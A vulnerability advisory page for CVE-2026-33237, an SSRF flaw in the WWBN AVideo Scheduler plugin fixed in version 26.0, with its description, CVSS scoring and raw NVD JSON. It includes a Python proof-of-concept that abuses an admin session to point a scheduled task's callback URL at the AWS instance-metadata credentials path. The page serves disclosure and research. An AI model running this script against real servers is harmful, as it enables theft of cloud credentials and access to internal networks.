Security Vulnerability Report
中文
CVE-2026-33237 CVSS 5.5 MEDIUM

CVE-2026-33237

Published: 2026-03-21 00:16:27
Last Modified: 2026-04-13 18:16:30
Source: [email protected]

Description

WWBN AVideo is an open source video platform. Prior to version 26.0, the Scheduler plugin's `run()` function in `plugin/Scheduler/Scheduler.php` calls `url_get_contents()` with an admin-configurable `callbackURL` that is validated only by `isValidURL()` (URL format check). Unlike other AVideo endpoints that were recently patched for SSRF (GHSA-9x67-f2v7-63rw, GHSA-h39h-7cvg-q7j6), the Scheduler's callback URL is never passed through `isSSRFSafeURL()`, which blocks requests to RFC-1918 private addresses, loopback, and cloud metadata endpoints. An admin can configure a scheduled task with an internal network `callbackURL` to perform SSRF against cloud infrastructure metadata services or internal APIs not otherwise reachable from the internet. Version 26.0 contains a patch for the issue.

CVSS Details

CVSS Score
5.5
Severity
MEDIUM
CVSS Vector
CVSS:3.1/AV:N/AC:L/PR:H/UI:N/S:U/C:H/I:L/A:N

Configurations (Affected Products)

cpe:2.3:a:wwbn:avideo:*:*:*:*:*:*:*:* - VULNERABLE
WWBN AVideo < 26.0

PoC / Exploit Code

⚠ For Security Research Only
The following code is for security research and authorized testing only.
python
# Proof of Concept for CVE-2026-33237 # This script requires valid administrator credentials to exploit the SSRF. import requests def exploit_ssrf(target_host, admin_session): # The vulnerable endpoint for configuring the scheduler url = f"{target_host}/objects/pluginScheduler.json.php" # Malicious payload targeting AWS metadata service (or internal network) # This bypasses isValidURL() but is not blocked by isSSRFSafeURL() ssrf_payload = "http://169.254.169.254/latest/meta-data/iam/security-credentials/" # Data to create a scheduled task with the malicious callback data = { 'callbackURL': ssrf_payload, 'action': 'save', 'run_interval': '3600', 'title': 'Malicious Task' } try: print(f"[*] Sending malicious payload to {target_host}...") response = admin_session.post(url, data=data) if response.status_code == 200: print("[+] Scheduler task configured successfully.") print("[+] The server will now request the internal metadata URL when the task runs.") else: print(f"[-] Failed to configure task. Status code: {response.status_code}") except Exception as e: print(f"[-] Error: {e}") # Usage example: # session = requests.Session() # session.post("/login", data={"user":"admin", "pass":"password"}) # exploit_ssrf("http://avideo-example.com", session)

References

Raw JSON Data

JSON
{"cve": {"id": "CVE-2026-33237", "sourceIdentifier": "[email protected]", "published": "2026-03-21T00:16:26.523", "lastModified": "2026-04-13T18:16:29.593", "vulnStatus": "Modified", "cveTags": [], "descriptions": [{"lang": "en", "value": "WWBN AVideo is an open source video platform. Prior to version 26.0, the Scheduler plugin's `run()` function in `plugin/Scheduler/Scheduler.php` calls `url_get_contents()` with an admin-configurable `callbackURL` that is validated only by `isValidURL()` (URL format check). Unlike other AVideo endpoints that were recently patched for SSRF (GHSA-9x67-f2v7-63rw, GHSA-h39h-7cvg-q7j6), the Scheduler's callback URL is never passed through `isSSRFSafeURL()`, which blocks requests to RFC-1918 private addresses, loopback, and cloud metadata endpoints. An admin can configure a scheduled task with an internal network `callbackURL` to perform SSRF against cloud infrastructure metadata services or internal APIs not otherwise reachable from the internet. Version 26.0 contains a patch for the issue."}, {"lang": "es", "value": "WWBN AVideo es una plataforma de video de código abierto. Antes de la versión 26.0, la función 'run()' del plugin Scheduler en 'plugin/Scheduler/Scheduler.php' llama a 'url_get_contents()' con una 'callbackURL' configurable por el administrador que es validada únicamente por 'isValidURL()' (verificación de formato de URL). A diferencia de otros endpoints de AVideo que fueron recientemente parcheados para SSRF (GHSA-9x67-f2v7-63rw, GHSA-h39h-7cvg-q7j6), la URL de callback del Scheduler nunca pasa por 'isSSRFSafeURL()', que bloquea las solicitudes a direcciones privadas RFC-1918, loopback y endpoints de metadatos en la nube. Un administrador puede configurar una tarea programada con una 'callbackURL' de red interna para realizar SSRF contra servicios de metadatos de infraestructura en la nube o APIs internas no accesibles de otra manera desde internet. La versión 26.0 contiene un parche para el problema."}], "metrics": {"cvssMetricV31": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:H/UI:N/S:U/C:H/I:L/A:N", "baseScore": 5.5, "baseSeverity": "MEDIUM", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "HIGH", "userInteraction": "NONE", "scope": "UNCHANGED", "confidentialityImpact": "HIGH", "integrityImpact": "LOW", "availabilityImpact": "NONE"}, "exploitabilityScore": 1.2, "impactScore": 4.2}]}, "weaknesses": [{"source": "[email protected]", "type": "Secondary", "description": [{"lang": "en", "value": "CWE-918"}]}], "configurations": [{"nodes": [{"operator": "OR", "negate": false, "cpeMatch": [{"vulnerable": true, "criteria": "cpe:2.3:a:wwbn:avideo:*:*:*:*:*:*:*:*", "versionEndExcluding": "26.0", "matchCriteriaId": "B468F0CE-E5E7-4607-BD15-B5763C47493E"}]}]}], "references": [{"url": "https://github.com/WWBN/AVideo/commit/df926e500580c2a1e3c70351f0c30f4e15c0fd83", "source": "[email protected]", "tags": ["Patch"]}, {"url": "https://github.com/WWBN/AVideo/issues/10403", "source": "[email protected]"}, {"url": "https://github.com/WWBN/AVideo/security/advisories/GHSA-v467-g7g7-hhfh", "source": "[email protected]", "tags": ["Exploit", "Mitigation", "Vendor Advisory"]}]}}
Disclaimer

This information is for security research and authorized penetration testing only. Unauthorized testing of other systems is illegal.